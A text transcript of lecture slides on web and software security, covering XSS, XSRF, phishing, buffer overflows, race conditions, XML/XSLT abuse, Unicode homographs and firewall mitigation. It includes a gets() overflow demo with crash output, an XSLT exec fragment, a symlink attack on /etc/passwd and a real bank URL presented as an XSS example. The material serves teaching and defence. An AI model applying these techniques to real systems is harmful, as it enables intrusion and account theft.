attacks, mitigation and fundamental software problems
DESCRIPTION
Attacks, Mitigation and fundamental software problems. Input Validation, Filtering and Damage Control as Software Mechanisms. Attack Examples. XSS, XSRF, Buffer Overflows, Character Aliases etc. Threat and Mitigation Ladder. Pseudonyms, faked reptuation, social attacks,. - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/1.jpg)
Attacks, Mitigation and fundamental software
problems
Input Validation, Filtering and Damage Control as Software
Mechanisms
![Page 2: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/2.jpg)
Attack Examples
XSS, XSRF, Buffer Overflows, Character Aliases etc.
![Page 3: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/3.jpg)
Multi-user
Network
Network
Home PC
Appli
cation
User
Software Developer
Peer-to-Peer /web2.0 collaboration
Login trojan
spoofing,,
sniffing, MIM
Script, Spoof Virus, Trojan, Cred.
stealing
(Cross site) script attack
Phising
Spoofing
Google hacks, sw-architectur
e
Pseudonyms, faked
reptuation, social attacks,
TimeACLs
SSL/PKI
Pers. Firewall, Anti-virus, 2 Factor Auth.(PIN/TAN)
Input Validation
Signed TA's GUI improv.
Closures, IOC Frameworks J2EE transp.
Research!
Threat and Mitigation Ladder
![Page 4: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/4.jpg)
A1 Unvalidated Input A4 Cross Site Scripting A5 Buffer Overflow A6 Injection Flaws A7 Improper Error Handling A9 Application Denial of Service
Input/Output Related
A2 Broken Access Control A3 Broken Authentication and Session Management A9 Application Denial of Service
AAA related
A8 Insecure Storage A9 Application Denial of Service A10 Insecure Configuration Management
Infrastructure
A9 Application Denial of Service
System Engineering
![Page 5: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/5.jpg)
http://www.lbbw.de/lbbw/html.nsf/webdokumente/framebooster.htm?OpenDocument&url=http://www.google.de
A "Phishing-Link" to LBBW Bank: XSS due to bad input validation
Hostname of bank:
Attack URL (in reality: some IP address or a name close to the original site name like lbbw-systems, lbbw-tech etc.
![Page 6: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/6.jpg)
![Page 7: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/7.jpg)
Browser/Mail Reader
Phishing Mail: „Dear Customer of mybank…“<a href=„www.badguy.de“> www.mybank.de</a>
Badguy.de
mybank.de
1. Trick User into clicking on URL 2. User connects to
badguy.de
3. Badguy forwards requests to bank and sends responses back to user
4. Bank asks user to login.
5. User does Transaktions
6. Man-in-the-middle modifies transactions on the fly. Modifies Responses too.
7. Bank sends Users sms with TAN.
8. User sends TAN to badguy
SMS/TAN
TAN
TAN
![Page 8: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/8.jpg)
Victim Browser WebShop (accepts GET param.
And plays them back to victim, Thereby downloading the Script code to the victim
HTML UrlTarget: webshop
With script in GETparameters
Get webshop/guestbook?par1=„<script..>
Attacker Web Server
New page with script
User visits attacker site and clicks on link
CookieMailer
Cross-Site Scripting (XSS)
Script sends cookie to attacker
![Page 9: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/9.jpg)
Victim Browser WebShop (accepts form as
Valid order because of existingSession with client)
HTML FormTarget: webshop
Inputfields: order withShipping address of
attacker
Form post
Attacker Web Server
Form response
User visits attacker site and clicks on link to (prefilled) form
CookieShop
Cross-Site Request Forgery (XSRF or Web-trojan)
Existing session before attack
![Page 10: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/10.jpg)
Victom Browser
Webmailer
HTML FormTarget: WebmailerGET params with
script code
Attacker Web Server
User visits attacker site and clicks on link to webmailer
CookieMailer
(does not checkInput field with script)
Userprofile
Script fromAttacker
Script fromAttacker
DB contaminated
Injection Attack
![Page 11: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/11.jpg)
#include <stdio.h>
int main(int argc, char** argv) { int foo=0xeeee; char myArray[4]; gets(myArray); printf(" print integer first: %x ", foo); printf("%s ", myArray);
}
Keyboard Input (with return) Display Output
a Eeee a
aa Eeee aa
aaa Eeee aaa
aaaa Ee00 aaaa
aaaaaaaaaaaaaa Core dump with EIP = 6161616161616161 (Hex 61 == `a`)
![Page 12: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/12.jpg)
Exception: STATUS_ACCESS_VIOLATION at eip=61616161eax=00000012 ebx=00000004 ecx=610E3038 edx=00000000 esi=004010AE edi=610E21A0ebp=61616161 esp=0022EF08 program=D:\kriha\security\bufferoverflow\over.exe, pid 720, thread maincs=001B ds=0023 es=0023 fs=003B gs=0000 ss=0023Stack trace:Frame Function Args 90087 [main] over 720 handle_exceptions: Exception: STATUS_ACCESS_VIOLATION 104452 [main] over 720 handle_exceptions: Error while dumping state (probably corrupted stack)
Our „aaaaaaaa..“ input from keyboard is now the address where the next instruction should be read by the CPU. Now we know how to point the CPU to code we placed on the stack
A program crash is a way into the system!
![Page 13: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/13.jpg)
Function ParameterLeftmost Function ParameterRETURN AddressCaller BP copyFoomyArray[3] myArray[1] myArray[1] myArray[0]
Keyboard Input (with return) Stack layout
a eeee a (first array element)
aa eeee aa (first and second)
aaa eeee aaa (first, second and third)
aaaa ee00 aaaa (4 array elements + zero)
aaaaaaaaaaaaaa aaaaaaaaaaa (all local variables and the return address overwritten, crash on function return
Gets() starts writing here
Address overwritten!
a
a
a
a
Stack
Layout
![Page 14: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/14.jpg)
The kernal trap interface
push len ;message length
push msg ;message to write
push 1 ;file descriptor (stdout)
mov AX, 0x4 ;system call number (sys_write)
int 0x80 ; kernel interrupt (trap)
add SP, 12 ;clean stack (3 arguments * 4)
push 0 ;exit code
mov AX, 0x1 ;system call number (sys_exit)
int 0x80 ; kernel interrupt we do not return from sys_exit there's no need to clean stack
The trap (system call interface) ist very important for attack code because it is POSITION INDEPENDENT! Your code is NOT LINKED with the running program and therefore does not know where specific library functions etc. are located in your program. The kernel interface is always just there and can be used to load Dynamic Link Libraries into the program.
your code wants to send a message msg to stdout:
![Page 15: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/15.jpg)
• Wrong input length of variables
• Variables containing wrong characters or meta-characters
• Variables containing SQL commands
• Responses which expose SOAP error codes
Attack Vectors on Web Services:
![Page 16: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/16.jpg)
Administration and Race Conditions: toc2tou bugs
Root
User
Change owner
change identity to user
Change runtime environment to jail
Jails strips off other rights
Not atomic!
![Page 17: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/17.jpg)
# Admin tries to create temp file
touch /tmp/myFile
# Overwrites passwd accidentially
echo foo > /tmp/myFile…
Admin:
# Attacker creates symbolic link to passwd
Ln –s /etc/passwed /tmp/myFile
Attacker (knows temp filename)
Time
![Page 18: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/18.jpg)
# check permissions
Fstat(/tmp/myFile)
Open(/tmp/myFile)
… processing…
SetUid Program: Attacker
Chgrp foo bar
Time
![Page 19: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/19.jpg)
Here the danger is that any program can send certain window messages which contain function addresses IN THE RECEIVERS ADDRESS SPACE. By placing some attack code into the receiver (not hard if a GUI is used by the receiver) the attacker can then direct the receiver message handler to direct control flow to the attack code (step 4 above).
Shatter Attack: fundamental software design flaws
WindowsService
Text Entry Field
GUI Dialog
1. insert attack code in field
3.send window message with function address 0x4711
Text Entry Field
0x4711
2.find location of attack code
window message handler
4. receive function address and call it
![Page 20: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/20.jpg)
Parser
Receiver
XMLfile with entity reference
Entity
XSLTproc.
IntranetEntity
result document withembedded entity
Other host
Does your XML processing system check the URIs of entity references BEFORE accessing them?
If you offer a rendering service you might be abused to create artificial hits on some host.
DOS Attack Internal information exposure attack
WebServ.
![Page 21: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/21.jpg)
<?xml version='1.0'?>
<xsl:stylesheet xmlns:xsl=http://www.w3.org/1999/XSL/Transform version='1.0'>
<xsl:output method="html„ encoding="ISO-8859-1„ indent="no"/>
<!-- ==================================================== -->
<xsl:script language=„java“ implements-prefix=„sy“ src=„java:java.util.system“/>
<xsl:template match="*">
<xsl:message>
<xsl:text>No template matches </xsl:text>
<xsl:value-of select=„sy:exec(…)"/>
<xsl:text>.</xsl:text>
</xsl:message>
![Page 22: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/22.jpg)
Suppressing Validation
Parser
Receiver
XMLfile with foul schema
foul schema
XSLTproc.
goodschema
result document withembedded entity
Other host
James Clark mentioned recently an especially evil way to work around validation: „Suppose an application is trying to use validation to protect itself from bad input. It carefully loads the schema cache with the namespaces it knows about, and calls validate(). Now the bad guy comes along and uses a root element from some other namespace and uses xsi:schemaLocation to point to his own schema that that has a declaration for that element and uses <xs:any namespace="##any„ processContents="skip"/>. Won't they just have almost completely undermined any protection that was supposed to come from validation?“
![Page 23: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/23.jpg)
Code points for most characters in the languages of the world
Unicode code points (names and numbers of charcters) 9% of 4 Gigabyte
UTF8, UTF16 or UTH32 Encodings of code points(code units or blocks)
3 different ways to encode ALL code points (size vs. performance)
arbitrary glyphs (fonts)Not defined by unicode.
![Page 24: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/24.jpg)
Code points
One codepoint can have several different encodings. Filter code needs to NORMALIZE FIRST and then FILTER!
Encoding
\
0x4711 0x12… 0x.. 0x..
Filter code to detect ..\..\ attacks:
If (encoded == 0x4711)
removeCharacter();
// what about the other possible encodings of backslash????
![Page 25: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/25.jpg)
Unicode Exploit
Processors are not allowed to interpret any encoding other than the shortest form, in this case 0. Otherwise the extended forms could escape filtering and become active during interpretation.
code point U+0000
Unicode code points (names and numbers of charcters) 9% of 4 Gigabyte
encoded as: 0, 110 00000 10 000000, etc.
![Page 26: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/26.jpg)
Encodings
Font glyphs
One visual „look“ (e.g. lowercase „l“ and uppercase „I“ or greek omicron vs latin o.
I,l,O0
Fonts can display unicode code points any way they want.
0x4711 0x1998
![Page 27: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/27.jpg)
Unicode homographs and DNS
The firefox browser switched back to showing the unicode escape sequences in domain names to allow the user to differenciate e.g. a latin „a“ from a kyrillic „a“. Otherwise the user could be tricked into connecting to www.ebay.com with the „a“ being really the cyrillic version. In this case the user would connect to the wrong site. Expect many more security problems with unicode in the future, especially in the GUI area.
Two different code points
ASCII DNS
DNS names can now contain Unicode characters
two different fonts
One visual „look“ (e.g. lowercase „l“ and uppercase „I“ or greek omicron vs latin o.
I,l,O
Not defined by unicode.
Unicode Characters DNS
![Page 28: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/28.jpg)
![Page 29: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/29.jpg)
Sample REST Request with Style Parameter
http://webservices.amazon.com/onca/xml?Service=AWSECommerceService &AWSAccessKeyId=[Your Access Key ID Here] &Operation=ItemLookup &IdType=ASIN &ItemId=B00008OE6I &ResponseGroup=Large &Style=http://www.yourdomain.com/your-xsl-style-sheet.xsl
AMAZON E-Commerce Service
![Page 30: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/30.jpg)
Form
InputID
4711 walter
Inputname
kriha
Servlet/getId
<request> <id>4711</id> </request>
Web server
<response> <id>4711</id> <name>kriha</name> <firstname>walter</firstname></response>
XMLHttpRequest.send()
Function callback() { // update DOM }
Inputfirst
ID: 4711
Name: kriha
First: walter
locate
Browser
JavaScript
Page
DOM
Use JSON serialization alternatively!
![Page 31: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/31.jpg)
Script Site 1
Content
Page
JavaScript
Frame1
Script Site 2
Content
JavaScript
Frame2
![Page 32: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/32.jpg)
ID: 4711
Name: kriha
First: walter
locate
Page
Browser User 1
Web 2.0 Community Wiki/Place Web Server
Profile User 1
Profile User 2
Common Pages
Common Pages
Same domain and public!
Script
![Page 33: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/33.jpg)
Under control
Web serverBrowser
JavaScript
Page
CSS/RSS
Browserhistory
Intranet with automatic SSO
Fingerprinting with link statements
Cross-Site Request Forging Port scans
with img/links and „onerror“
Check for sites visited and queries made keylogger
control
Embedded script in PDF, MOV etc.
![Page 34: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/34.jpg)
Known Mitigation Examples
WAF Filtering, Network level filtering
![Page 35: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/35.jpg)
Web-Serviceclient
FirewallApplication
ServerWeb
Server
Mod_security
http, port 80, 443
POST /InStock HTTP/1.1 Host: www.example.org Content-Type: application/soap+xml; charset=utf-8 Content-Length: nnn
<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap-envelope" soap:encodingStyle="http://www.w3.org/2001/12/soap-encoding">
<soap:Body xmlns:k="http://www.kriha.org/number"> <m:GetId> <m:Number>4711</m:Number> </m:GetId>
</soap:Body>
</soap:Envelope>
Check Number for:
- Length
- Characters/Meta
- SQL commands
Check request for
Soap faultcode (avoid exposure of error information)
SecFilterSelective Number "!^(|[0-9]{1,9})$"
![Page 36: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/36.jpg)
• URL checking
• Unicode normalization
• Message canonicalization for filtering
• Stateful filtering of selected requests
• Stateful connection of input/output values
• Stateful link/request control (did the link come from the server?)
Other security related features of Web Application Firewalls (e.g. mod-security)
![Page 37: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/37.jpg)
Interface TaintedString
Check()
getString()
TaintedInputString(String)
Check() {
checkSQL()
checkJavaScript()
checkUnicode()
}
String getString() {
Check()
Return string;
}
TaintedOutputString(String)
Check() {
checkForOwnScriptOnly()}
String getString() {Check()Return string;}
![Page 38: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/38.jpg)
Paketfilter
external network address internal network address
IP Header Parameters
(e.g. protocol tcp or udp)
TCP Header Parameters
(e.g port and direction)
ICMP Header Parameters (e.g. packet
size, types)
destination/source address destination/source address
NIC1 NIC2
from : to
xxx(20) yyy(4567), tcp
yyy(4567) xxx(20), tcp
To Intranet
To Internet
Rules from Firewall-Policy:
If (port == 22) && (protocol == TCP) &&(NIC1-outgoing)Action: Accept
(not real IPTABLES syntax)
Packet
![Page 39: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/39.jpg)
Version | header length | Type of Service | Total Length
Identification | Flags | Fragmentation Offset
Time to live | Protocol | Header Checksum
Source Address
Destination Address
Options | Padding
data ..................
Network Address Translation (NAT)
means that the source or
destination address of a
packet is changed
With Source NAT (SNAT), the source address is changed, e.g. to map from private IP addresses to the real IP address of a firewall,
thereby hiding the internal network.
With Destination NAT (DNAT)
the target address is changed, e.g.
to allow transparent
proxying or load-balancing
masquerading is almost like SNAT
only that there is no static IP address.
Instead, the source address is
dynamically grabbed from an ISP, e.g via DHCP, pppoe etc.
![Page 40: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/40.jpg)
NF_IP_PRE_ROUTING NF_IP_FORWARD
NF_IP_LOCAL_IN NF_IP_LOCAL_OUT
NF_IP_POST_ROUTING
Routing
Routing
Filter table
Nat table
Mangle table
to Firewallfrom Firewall
through Firewall
![Page 41: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/41.jpg)
Input chain
Destination NAT
Forward Chain
all input not directed at the firewall itself
goes here
Source NAT happens here
firewall generated packets
RoutingPre-
processing
Output Chain
Post-processing
Routing
Packet Changes ONLY here
![Page 42: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/42.jpg)
Example:
• iptables –T FILTER –A INPUT –i $IFACE –p tcp –sport 80 –m state –state ESTABLISHED –j ACCEPT (allow incoming web traffic if it belongs to a previous outgoing request)
• iptables –A INPUT –i $IFACE –p tcp –sport 20 –m state –state ESTABLISHED, RELATED –j ACCEPT (allow incoming ACTIVE ftp traffic if it belongs to a previous outgoing request, even though the incoming request is for a new – but related - port)
• iptables –A INPUT –i $IFACE – p udp –j LOG –log-prefix „UDP Incoming:“
•iptables –A INPUT –i $IFACE – p udp –j DROP (log and drop all udp traffic)
iptables -t table -command [chain] [match] –j [target/jump]
![Page 43: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/43.jpg)
![Page 44: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/44.jpg)
![Page 45: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/45.jpg)
filter (firewall) (internet)192.168.1.0/24 (intranet)
smtp host
WEB host
DNS host
192.84.219.128
192.84.219.129
192.84.219.130
192.168.1.250
![Page 46: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/46.jpg)
2. Udp packet to 11.12.13.14:9000
The trick is in the 2. step: by sending a upd packet to destination address:target port (which gets thrown away) the OWN firewall learns to expect packages from this address because it believes them to be a RESPONSE (Jürgen Schmidt)
Skype server
IP Firewall 1.2.3.4
IP host in intranet:192.168.1.20
IP host in intranet: 192.168.1.20
2. Udp packet to 1.2.3.4:8000
1. Register with server, get partner IP and Port (1.2.3.4:8000)
1. Register with server, get partner IP and Port (11.12.13.14:9000)
IP Firewall 11.12.13.14
Source: 1.2.3.4:8000
Source: 11.12.13.14:9000
Source:8000
Source:9000
![Page 47: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/47.jpg)
XMLHttpRequest
Authent.Plug-in
Authent.Server
Web ServerBrowser
ApplicationServer
LoginPage
Session
Request
Session timeout
302 login
![Page 48: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/48.jpg)
BrowserAction
Security Zone (Intranet;
Internet etc.)
PrivilegeRequired Firefox/Mozilla
Internet Explorer
Depends on Zone
Depends on check per action
Persistent
![Page 49: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/49.jpg)
Fundamental Questions
![Page 50: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/50.jpg)
Input Validation
• Are Regexp checks enough?• How do Servlet Filters work?• How to separate Non-terminals from
terminals?• Forwarding of modified request data – the
problem of double-decoding• Is application input a language? Of what
type? How expressed? Design question?• Tainting as a software mechanism
![Page 51: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/51.jpg)
Filtering
• Anti-patterns of filter use?
• Proof of correctness – is illegal input blocked?
• Proof of liveness – does legal input still get through?
• Mixing of reject and accept statements?
• Filter models and automated checkers?
• Filter positions in software?
![Page 52: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/52.jpg)
Concurrency
• Libraries for safe shell programming?
• Is shared state multithreading reliable and predictable?
• Architectures for safe concurrency (Miller)?
• Active Objects, CSP etc.
![Page 53: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/53.jpg)
Ambient Authority
• How to restrict system call access?
• How to prevent arbitrary initial authority?
• Software architectures to achieve loader isolation?
• Language features for secure software?
• Damage control features in operating systems, languages and applications
![Page 54: Attacks, Mitigation and fundamental software problems](https://reader036.vdocuments.site/reader036/viewer/2022062322/5681449d550346895db14e2d/html5/thumbnails/54.jpg)
Signs and Minds
• How to avoid confusion about identity?• How to represent system messages
reliably and without chance for fake messages?
• Software technology to establish a trusted path for users?
• Charcter sets and representations as fonts?
• Reliable detection of character aliases?